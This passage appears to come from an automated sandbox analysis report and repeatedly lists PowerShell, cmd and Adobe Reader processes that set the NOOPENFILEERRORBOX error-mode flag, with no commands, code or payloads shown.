        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
